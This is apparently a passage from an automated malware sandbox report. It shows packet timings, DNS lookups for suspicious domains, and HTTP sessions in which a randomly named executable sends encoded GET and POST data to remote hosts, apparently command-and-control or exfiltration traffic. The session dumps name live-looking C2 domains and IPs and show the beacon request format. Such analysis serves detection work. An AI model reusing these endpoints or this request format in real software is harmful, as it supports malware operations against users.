                  Jul 4, 2024 03:13:48.547827005 CEST4977680192.168.2.4202.95.21.152
                  Jul 4, 2024 03:13:48.552683115 CEST8049776202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:48.552781105 CEST4977680192.168.2.4202.95.21.152
                  Jul 4, 2024 03:13:48.555866003 CEST4977680192.168.2.4202.95.21.152
                  Jul 4, 2024 03:13:48.560724974 CEST8049776202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:49.232925892 CEST4977580192.168.2.435.190.52.58
                  Jul 4, 2024 03:13:49.515157938 CEST8049776202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:49.515258074 CEST8049776202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:49.515315056 CEST4977680192.168.2.4202.95.21.152
                  Jul 4, 2024 03:13:50.060827971 CEST4977680192.168.2.4202.95.21.152
                  Jul 4, 2024 03:13:50.250720978 CEST4977780192.168.2.435.190.52.58
                  Jul 4, 2024 03:13:50.255557060 CEST804977735.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:50.255645990 CEST4977780192.168.2.435.190.52.58
                  Jul 4, 2024 03:13:50.257460117 CEST4977780192.168.2.435.190.52.58
                  Jul 4, 2024 03:13:50.262293100 CEST804977735.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:50.262301922 CEST804977735.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:50.262324095 CEST804977735.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:50.262332916 CEST804977735.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:50.262341022 CEST804977735.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:50.262481928 CEST804977735.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:50.262489080 CEST804977735.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:50.262495995 CEST804977735.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:50.262509108 CEST804977735.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:50.931133986 CEST804977735.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:50.934201002 CEST804977735.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:50.934243917 CEST804977735.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:50.934250116 CEST4977780192.168.2.435.190.52.58
                  Jul 4, 2024 03:13:50.934313059 CEST4977780192.168.2.435.190.52.58
                  Jul 4, 2024 03:13:51.078313112 CEST4977880192.168.2.4202.95.21.152
                  Jul 4, 2024 03:13:51.083105087 CEST8049778202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:51.083276033 CEST4977880192.168.2.4202.95.21.152
                  Jul 4, 2024 03:13:51.085139990 CEST4977880192.168.2.4202.95.21.152
                  Jul 4, 2024 03:13:51.089973927 CEST8049778202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:51.089982986 CEST8049778202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:51.090024948 CEST8049778202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:51.090033054 CEST8049778202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:51.090039968 CEST8049778202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:51.090049028 CEST8049778202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:51.090152025 CEST8049778202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:51.090158939 CEST8049778202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:51.090172052 CEST8049778202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:51.763485909 CEST4977780192.168.2.435.190.52.58
                  Jul 4, 2024 03:13:52.042428970 CEST8049778202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:52.042649031 CEST | 80 | 49778 | 202.95.21.152 | 192.168.2.4
                  Jul 4, 2024 03:13:52.042745113 CEST | 49778 | 80 | 192.168.2.4 | 202.95.21.152
                  Jul 4, 2024 03:13:52.591671944 CEST | 49778 | 80 | 192.168.2.4 | 202.95.21.152
                  Jul 4, 2024 03:13:52.783879042 CEST | 49779 | 80 | 192.168.2.4 | 35.190.52.58
                  Jul 4, 2024 03:13:52.788676977 CEST | 80 | 49779 | 35.190.52.58 | 192.168.2.4
                  Jul 4, 2024 03:13:52.788840055 CEST | 49779 | 80 | 192.168.2.4 | 35.190.52.58
                  Jul 4, 2024 03:13:52.790652990 CEST | 49779 | 80 | 192.168.2.4 | 35.190.52.58
                  Jul 4, 2024 03:13:52.795394897 CEST | 80 | 49779 | 35.190.52.58 | 192.168.2.4
                  Jul 4, 2024 03:13:53.611563921 CEST | 49780 | 80 | 192.168.2.4 | 202.95.21.152
                  Jul 4, 2024 03:13:53.623119116 CEST | 80 | 49779 | 35.190.52.58 | 192.168.2.4
                  Jul 4, 2024 03:13:53.623135090 CEST | 80 | 49779 | 35.190.52.58 | 192.168.2.4
                  Jul 4, 2024 03:13:53.623188019 CEST | 80 | 49779 | 35.190.52.58 | 192.168.2.4
                  Jul 4, 2024 03:13:53.623198032 CEST | 80 | 49779 | 35.190.52.58 | 192.168.2.4
                  Jul 4, 2024 03:13:53.623207092 CEST | 80 | 49779 | 35.190.52.58 | 192.168.2.4
                  Jul 4, 2024 03:13:53.623251915 CEST | 49779 | 80 | 192.168.2.4 | 35.190.52.58
                  Jul 4, 2024 03:13:53.623435974 CEST | 80 | 49779 | 35.190.52.58 | 192.168.2.4
                  Jul 4, 2024 03:13:53.623445034 CEST | 80 | 49779 | 35.190.52.58 | 192.168.2.4
                  Jul 4, 2024 03:13:53.623451948 CEST | 80 | 49779 | 35.190.52.58 | 192.168.2.4
                  Jul 4, 2024 03:13:53.623475075 CEST | 49779 | 80 | 192.168.2.4 | 35.190.52.58
                  Jul 4, 2024 03:13:53.623490095 CEST | 49779 | 80 | 192.168.2.4 | 35.190.52.58
                  Jul 4, 2024 03:13:53.623662949 CEST | 80 | 49780 | 202.95.21.152 | 192.168.2.4
                  Jul 4, 2024 03:13:53.623720884 CEST | 49780 | 80 | 192.168.2.4 | 202.95.21.152
                  Jul 4, 2024 03:13:53.626059055 CEST | 49780 | 80 | 192.168.2.4 | 202.95.21.152
                  Jul 4, 2024 03:13:53.629578114 CEST | 49779 | 80 | 192.168.2.4 | 35.190.52.58
                  Jul 4, 2024 03:13:53.630781889 CEST | 80 | 49780 | 202.95.21.152 | 192.168.2.4
                  Jul 4, 2024 03:13:53.634305000 CEST | 80 | 49779 | 35.190.52.58 | 192.168.2.4
                  Jul 4, 2024 03:13:54.555488110 CEST | 80 | 49780 | 202.95.21.152 | 192.168.2.4
                  Jul 4, 2024 03:13:54.555636883 CEST | 80 | 49780 | 202.95.21.152 | 192.168.2.4
                  Jul 4, 2024 03:13:54.555824995 CEST | 49780 | 80 | 192.168.2.4 | 202.95.21.152
                  Jul 4, 2024 03:13:54.559906006 CEST | 49780 | 80 | 192.168.2.4 | 202.95.21.152
                  Jul 4, 2024 03:13:54.564591885 CEST | 80 | 49780 | 202.95.21.152 | 192.168.2.4
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Jul 4, 2024 03:10:19.857705116 CEST | 56307 | 53 | 192.168.2.4 | 1.1.1.1
                  Jul 4, 2024 03:10:20.782758951 CEST | 53 | 56307 | 1.1.1.1 | 192.168.2.4
                  Jul 4, 2024 03:10:36.766735077 CEST | 58531 | 53 | 192.168.2.4 | 1.1.1.1
                  Jul 4, 2024 03:10:37.145905972 CEST | 53 | 58531 | 1.1.1.1 | 192.168.2.4
                  Jul 4, 2024 03:11:11.283696890 CEST | 53700 | 53 | 192.168.2.4 | 1.1.1.1
                  Jul 4, 2024 03:11:11.315695047 CEST | 53 | 53700 | 1.1.1.1 | 192.168.2.4
                  Jul 4, 2024 03:11:19.378156900 CEST | 57564 | 53 | 192.168.2.4 | 1.1.1.1
                  Jul 4, 2024 03:11:19.387598038 CEST | 53 | 57564 | 1.1.1.1 | 192.168.2.4
                  Jul 4, 2024 03:11:27.571491003 CEST | 63106 | 53 | 192.168.2.4 | 1.1.1.1
                  Jul 4, 2024 03:11:28.357954025 CEST | 53 | 63106 | 1.1.1.1 | 192.168.2.4
                  Jul 4, 2024 03:11:41.924815893 CEST | 53861 | 53 | 192.168.2.4 | 1.1.1.1
                  Jul 4, 2024 03:11:42.282088995 CEST | 53 | 53861 | 1.1.1.1 | 192.168.2.4
                  Jul 4, 2024 03:12:16.331712961 CEST | 65103 | 53 | 192.168.2.4 | 1.1.1.1
                  Jul 4, 2024 03:12:16.569386005 CEST | 53 | 65103 | 1.1.1.1 | 192.168.2.4
                  Jul 4, 2024 03:12:35.404607058 CEST | 63959 | 53 | 192.168.2.4 | 1.1.1.1
                  Jul 4, 2024 03:12:35.797411919 CEST | 53 | 63959 | 1.1.1.1 | 192.168.2.4
                  Jul 4, 2024 03:13:10.047499895 CEST | 58498 | 53 | 192.168.2.4 | 1.1.1.1
                  Jul 4, 2024 03:13:10.060240984 CEST | 53 | 58498 | 1.1.1.1 | 192.168.2.4
                  Jul 4, 2024 03:13:23.177923918 CEST | 57257 | 53 | 192.168.2.4 | 1.1.1.1
                  Jul 4, 2024 03:13:23.205317974 CEST | 53 | 57257 | 1.1.1.1 | 192.168.2.4
                  Jul 4, 2024 03:13:29.196033001 CEST | 52007 | 53 | 192.168.2.4 | 1.1.1.1
                  Jul 4, 2024 03:13:29.243078947 CEST | 53 | 52007 | 1.1.1.1 | 192.168.2.4
                  Jul 4, 2024 03:13:36.847847939 CEST | 65372 | 53 | 192.168.2.4 | 1.1.1.1
                  Jul 4, 2024 03:13:36.878722906 CEST | 53 | 65372 | 1.1.1.1 | 192.168.2.4
                  Jul 4, 2024 03:13:44.955859900 CEST | 65459 | 53 | 192.168.2.4 | 1.1.1.1
                  Jul 4, 2024 03:13:45.166656017 CEST | 53 | 65459 | 1.1.1.1 | 192.168.2.4
                  Jul 4, 2024 03:13:45.532718897 CEST | 62030 | 53 | 192.168.2.4 | 1.1.1.1
                  Jul 4, 2024 03:13:46.000287056 CEST | 53 | 62030 | 1.1.1.1 | 192.168.2.4
                  Jul 4, 2024 03:13:58.643754959 CEST | 59070 | 53 | 192.168.2.4 | 1.1.1.1
                  Jul 4, 2024 03:13:58.652618885 CEST | 53 | 59070 | 1.1.1.1 | 192.168.2.4
                  Jul 4, 2024 03:14:00.278691053 CEST | 53514 | 53 | 192.168.2.4 | 1.1.1.1
                  Jul 4, 2024 03:14:00.289150953 CEST | 53 | 53514 | 1.1.1.1 | 192.168.2.4
                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                  Jul 4, 2024 03:10:19.857705116 CEST | 192.168.2.4 | 1.1.1.1 | 0x29aa | Standard query (0) | www.778981.com | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:10:36.766735077 CEST | 192.168.2.4 | 1.1.1.1 | 0x549e | Standard query (0) | www.binpvae.lol | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:11:11.283696890 CEST | 192.168.2.4 | 1.1.1.1 | 0xeeb2 | Standard query (0) | www.byteffederal.com | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:11:19.378156900 CEST | 192.168.2.4 | 1.1.1.1 | 0x5210 | Standard query (0) | www.jjkelker.com | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:11:27.571491003 CEST | 192.168.2.4 | 1.1.1.1 | 0x9d72 | Standard query (0) | www.a9jcpf.top | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:11:41.924815893 CEST | 192.168.2.4 | 1.1.1.1 | 0xeba8 | Standard query (0) | www.mhtnvro.lol | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:12:16.331712961 CEST | 192.168.2.4 | 1.1.1.1 | 0xf149 | Standard query (0) | www.lexiecos.top | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:12:35.404607058 CEST | 192.168.2.4 | 1.1.1.1 | 0xc8d2 | Standard query (0) | www.augaqfp.lol | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:13:10.047499895 CEST | 192.168.2.4 | 1.1.1.1 | 0x6be | Standard query (0) | www.webuyfontana.com | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:13:23.177923918 CEST | 192.168.2.4 | 1.1.1.1 | 0x32bb | Standard query (0) | www.ytw6.top | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:13:29.196033001 CEST | 192.168.2.4 | 1.1.1.1 | 0xf1ce | Standard query (0) | www.ndhockeyprospects.com | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:13:36.847847939 CEST | 192.168.2.4 | 1.1.1.1 | 0x99af | Standard query (0) | www.caroinapottery.com | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:13:44.955859900 CEST | 192.168.2.4 | 1.1.1.1 | 0x8f3c | Standard query (0) | www.hsck520.com | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:13:45.532718897 CEST | 192.168.2.4 | 1.1.1.1 | 0x311a | Standard query (0) | www.qmancha.com | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:13:58.643754959 CEST | 192.168.2.4 | 1.1.1.1 | 0x5558 | Standard query (0) | www.mebutnotme.store | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:14:00.278691053 CEST | 192.168.2.4 | 1.1.1.1 | 0x997 | Standard query (0) | www.cloud-force.club | A (IP address) | IN (0x0001) | false
                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                  Jul 4, 2024 03:10:20.782758951 CEST | 1.1.1.1 | 192.168.2.4 | 0x29aa | No error (0) | www.778981.com | xjc-g1171-6-g-1584411309302y.onlinename11txcnddns.com | | CNAME (Canonical name) | IN (0x0001) | false
                  Jul 4, 2024 03:10:20.782758951 CEST | 1.1.1.1 | 192.168.2.4 | 0x29aa | No error (0) | xjc-g1171-6-g-1584411309302y.onlinename11txcnddns.com | g1171-6-g-1584411309302y.greycdn.net | | CNAME (Canonical name) | IN (0x0001) | false
                  Jul 4, 2024 03:10:20.782758951 CEST | 1.1.1.1 | 192.168.2.4 | 0x29aa | No error (0) | g1171-6-g-1584411309302y.greycdn.net | c96e98f1fy.greycdn.net | | CNAME (Canonical name) | IN (0x0001) | false
                  Jul 4, 2024 03:10:20.782758951 CEST | 1.1.1.1 | 192.168.2.4 | 0x29aa | No error (0) | c96e98f1fy.greycdn.net | 7a4ca695fd164z.greycdn.net | | CNAME (Canonical name) | IN (0x0001) | false
                  Jul 4, 2024 03:10:20.782758951 CEST | 1.1.1.1 | 192.168.2.4 | 0x29aa | No error (0) | 7a4ca695fd164z.greycdn.net | | 165.154.0.120 | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:10:37.145905972 CEST | 1.1.1.1 | 192.168.2.4 | 0x549e | No error (0) | www.binpvae.lol | | 116.213.43.190 | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:11:11.315695047 CEST | 1.1.1.1 | 192.168.2.4 | 0xeeb2 | Name error (3) | www.byteffederal.com | none | none | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:11:19.387598038 CEST | 1.1.1.1 | 192.168.2.4 | 0x5210 | Name error (3) | www.jjkelker.com | none | none | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:11:28.357954025 CEST | 1.1.1.1 | 192.168.2.4 | 0x9d72 | No error (0) | www.a9jcpf.top | kmdne.ajunsdfancsda.com | | CNAME (Canonical name) | IN (0x0001) | false
                  Jul 4, 2024 03:11:28.357954025 CEST | 1.1.1.1 | 192.168.2.4 | 0x9d72 | No error (0) | kmdne.ajunsdfancsda.com | aj.ajunsdfancsda.com | | CNAME (Canonical name) | IN (0x0001) | false
                  Jul 4, 2024 03:11:28.357954025 CEST | 1.1.1.1 | 192.168.2.4 | 0x9d72 | No error (0) | aj.ajunsdfancsda.com | | 207.148.37.252 | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:11:28.357954025 CEST | 1.1.1.1 | 192.168.2.4 | 0x9d72 | No error (0) | aj.ajunsdfancsda.com | | 147.92.38.243 | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:11:28.357954025 CEST | 1.1.1.1 | 192.168.2.4 | 0x9d72 | No error (0) | aj.ajunsdfancsda.com | | 45.126.181.243 | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:11:28.357954025 CEST | 1.1.1.1 | 192.168.2.4 | 0x9d72 | No error (0) | aj.ajunsdfancsda.com | | 147.92.36.231 | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:11:28.357954025 CEST | 1.1.1.1 | 192.168.2.4 | 0x9d72 | No error (0) | aj.ajunsdfancsda.com | | 147.92.36.233 | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:11:28.357954025 CEST | 1.1.1.1 | 192.168.2.4 | 0x9d72 | No error (0) | aj.ajunsdfancsda.com | | 45.126.181.242 | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:11:28.357954025 CEST | 1.1.1.1 | 192.168.2.4 | 0x9d72 | No error (0) | aj.ajunsdfancsda.com | | 147.92.36.232 | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:11:42.282088995 CEST | 1.1.1.1 | 192.168.2.4 | 0xeba8 | No error (0) | www.mhtnvro.lol | | 116.213.43.190 | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:12:16.569386005 CEST | 1.1.1.1 | 192.168.2.4 | 0xf149 | No error (0) | www.lexiecos.top | | 203.161.55.102 | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:12:35.797411919 CEST | 1.1.1.1 | 192.168.2.4 | 0xc8d2 | No error (0) | www.augaqfp.lol | | 116.213.43.190 | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:13:10.060240984 CEST | 1.1.1.1 | 192.168.2.4 | 0x6be | No error (0) | www.webuyfontana.com | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:13:10.060240984 CEST | 1.1.1.1 | 192.168.2.4 | 0x6be | No error (0) | www.webuyfontana.com | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:13:23.205317974 CEST | 1.1.1.1 | 192.168.2.4 | 0x32bb | No error (0) | www.ytw6.top | ytw6.top | | CNAME (Canonical name) | IN (0x0001) | false
                  Jul 4, 2024 03:13:23.205317974 CEST | 1.1.1.1 | 192.168.2.4 | 0x32bb | No error (0) | ytw6.top | | 38.47.232.224 | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:13:29.243078947 CEST | 1.1.1.1 | 192.168.2.4 | 0xf1ce | No error (0) | www.ndhockeyprospects.com | ndhockeyprospects.com | | CNAME (Canonical name) | IN (0x0001) | false
                  Jul 4, 2024 03:13:29.243078947 CEST | 1.1.1.1 | 192.168.2.4 | 0xf1ce | No error (0) | ndhockeyprospects.com | | 162.241.253.174 | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:13:36.878722906 CEST | 1.1.1.1 | 192.168.2.4 | 0x99af | Name error (3) | www.caroinapottery.com | none | none | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:13:45.166656017 CEST | 1.1.1.1 | 192.168.2.4 | 0x8f3c | No error (0) | www.hsck520.com | | 35.190.52.58 | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:13:46.000287056 CEST | 1.1.1.1 | 192.168.2.4 | 0x311a | No error (0) | www.qmancha.com | | 202.95.21.152 | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:13:58.652618885 CEST | 1.1.1.1 | 192.168.2.4 | 0x5558 | Name error (3) | www.mebutnotme.store | none | none | A (IP address) | IN (0x0001) | false
                  Jul 4, 2024 03:14:00.289150953 CEST | 1.1.1.1 | 192.168.2.4 | 0x997 | Server failure (2) | www.cloud-force.club | none | none | A (IP address) | IN (0x0001) | false
                  • www.778981.com
                  • www.binpvae.lol
                  • www.a9jcpf.top
                  • www.mhtnvro.lol
                  • www.lexiecos.top
                  • 185.234.72.101
                  • www.augaqfp.lol
                  • www.webuyfontana.com
                  • www.ytw6.top
                  • www.ndhockeyprospects.com
                  • www.hsck520.com
                  • www.qmancha.com
                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  0 | 192.168.2.4 | 49736 | 165.154.0.120 | 80 | 2844 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:10:20.795047998 CEST | 495 | OUT | GET /p1dd/?XHUPe=Ud3TZHA0-F74ZZ&n02X2xPX=G7DDmCfNGXy3uJCEgcIIU1iXFvarFYWbvsRS9sxoYaNScQyM2A1goKEbo8KV9mX8trrejs5AH6YGa7AwDEXag2zD7gw0a+PZJfygUURv+5LCwJWR5NAeUOI= HTTP/1.1
                  Host: www.778981.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Jul 4, 2024 03:10:21.714555979 CEST | 1236 | IN | HTTP/1.1 200 OK
                  Server: nginx
                  Date: Thu, 04 Jul 2024 01:10:21 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 3915
                  Connection: close
                  Last-Modified: Thu, 13 Jun 2024 18:55:23 GMT
                  Vary: Accept-Encoding
                  ETag: "666b409b-f4b"
                  Accept-Ranges: bytes
                  Data Raw: ef bb bf 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e8 af 9a e4 bf a1 e5 ae 89 e5 85 a8 ef bc 8c e8 b6 85 e5 87 a1 e4 bd 93 e9 aa 8c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 73 74 79 6c 65 73 2e 37 66 65 32 33 65 65 61 65 65 31 39 31 31 35 32 32 35 64 39 2e 63 73 73 22 3e 3c 2f 68 65 61 64 3e 0a 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 61 70 70 2d 72 6f 6f 74 3e 3c 2f 61 70 70 2d 72 6f 6f 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8" /> <title></title> <base href="/" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="stylesheet" href="styles.7fe23eeaee19115225d9.css"></head> <body> <app-root></app-root> <script src="https://v-cn.vaptcha.com/v3.js" async defer></script> ... Start of LiveChat (www.livechat.com) code --> <script> if (document.domain.includes('hs246.com') || document.domain.includes('xjc893.com')) { window.__lc = window.__lc || {} window.__lc.license = 14282961 ;(function (n, t, c) { function i(n) { return e._h ? e._h.apply(null, n) : e._q.push(n) } var e = { _q: [], _h: null, _v: '2.0', on: function () { i(['on', c.call(arguments)]) }, once: function () {
                  Jul 4, 2024 03:10:21.714987040 CEST | 224 | IN | Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 28 5b 27 6f 6e 63 65 27 2c 20 63 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 5d 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 66 66 3a 20 66 75 6e 63
                  Data Ascii: i(['once', c.call(arguments)]) }, off: function () { i(['off', c.call(arguments)]) }, get: function () { if (!e._h) throw new Error("
                  Jul 4, 2024 03:10:21.714996099 CEST | 1236 | IN | Data Raw: 5b 4c 69 76 65 43 68 61 74 57 69 64 67 65 74 5d 20 59 6f 75 20 63 61 6e 27 74 20 75 73 65 20 67 65 74 74 65 72 73 20 62 65 66 6f 72 65 20 6c 6f 61 64 2e 22 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 69 28 5b 27 67 65 74
                  Data Ascii: [LiveChatWidget] You can't use getters before load.") return i(['get', c.call(arguments)]) }, call: function () { i(['call', c.call(arguments)]) }, init: function () {
                  Jul 4, 2024 03:10:21.716105938 CEST | 1236 | IN | Data Raw: 3a 20 27 32 2e 30 27 2c 0a 20 20 20 20 20 20 20 20 20 20 6f 6e 3a 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 28 5b 27 6f 6e 27 2c 20 63 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 5d 29 0a 20 20 20 20
                  Data Ascii: : '2.0', on: function () { i(['on', c.call(arguments)]) }, once: function () { i(['once', c.call(arguments)]) }, off: function () { i(['off', c.call(argument
                  Jul 4, 2024 03:10:21.716114998 CEST | 248 | IN | Data Raw: 63 72 69 70 74 20 73 72 63 3d 22 70 6f 6c 79 66 69 6c 6c 73 2d 65 73 35 2e 66 34 61 39 39 64 35 31 65 65 61 37 66 32 63 37 35 34 61 65 2e 6a 73 22 20 6e 6f 6d 6f 64 75 6c 65 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 70
                  Data Ascii: cript src="polyfills-es5.f4a99d51eea7f2c754ae.js" nomodule></script><script src="polyfills.7033c6f4843a0f0135c9.js"></script><script src="scripts.5e45ff3d9a5f89eacb48.js"></script><script src="main.259892d8df6d082d7c24.js"></script></body></h


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  1 | 192.168.2.4 | 49737 | 116.213.43.190 | 80 | 2844 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:10:37.155345917 CEST | 753 | OUT | POST /kfqo/ HTTP/1.1
                  Host: www.binpvae.lol
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.binpvae.lol
                  Referer: http://www.binpvae.lol/kfqo/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 205
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 41 67 6d 39 54 37 44 4b 4d 41 32 38 4e 6e 70 74 34 4c 63 69 39 59 44 36 6f 74 7a 43 42 4c 67 71 74 32 70 78 59 36 58 41 35 71 79 75 6c 48 44 64 31 49 36 6e 44 4d 51 65 6d 34 70 57 4f 59 31 35 37 4c 59 70 78 30 50 54 51 63 73 48 6d 5a 34 4c 6a 4c 6a 43 2b 70 78 77 4d 77 42 77 52 55 32 6d 54 59 50 66 73 6e 69 45 4f 47 2f 47 4e 73 6f 62 63 38 2b 44 49 31 74 6b 55 69 58 32 70 78 54 56 61 4e 75 54 39 72 2b 58 35 4c 34 58 74 6f 74 6f 73 34 48 4a 4c 67 4a 46 67 45 47 6e 4c 57 5a 61 43 49 38 34 66 57 4e 51 56 55 6e 78 4a 6b 51 6f 41 41 35 4d 72 6a 41 6a 35 48 50 4f 57 49 31 68 4c 77 3d 3d
                  Data Ascii: n02X2xPX=Agm9T7DKMA28Nnpt4Lci9YD6otzCBLgqt2pxY6XA5qyulHDd1I6nDMQem4pWOY157LYpx0PTQcsHmZ4LjLjC+pxwMwBwRU2mTYPfsniEOG/GNsobc8+DI1tkUiX2pxTVaNuT9r+X5L4Xtotos4HJLgJFgEGnLWZaCI84fWNQVUnxJkQoAA5MrjAj5HPOWI1hLw==


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  2 | 192.168.2.4 | 49738 | 116.213.43.190 | 80 | 2844 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:10:39.695122004 CEST | 773 | OUT | POST /kfqo/ HTTP/1.1
                  Host: www.binpvae.lol
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.binpvae.lol
                  Referer: http://www.binpvae.lol/kfqo/
                  Cache-Control: no-cache
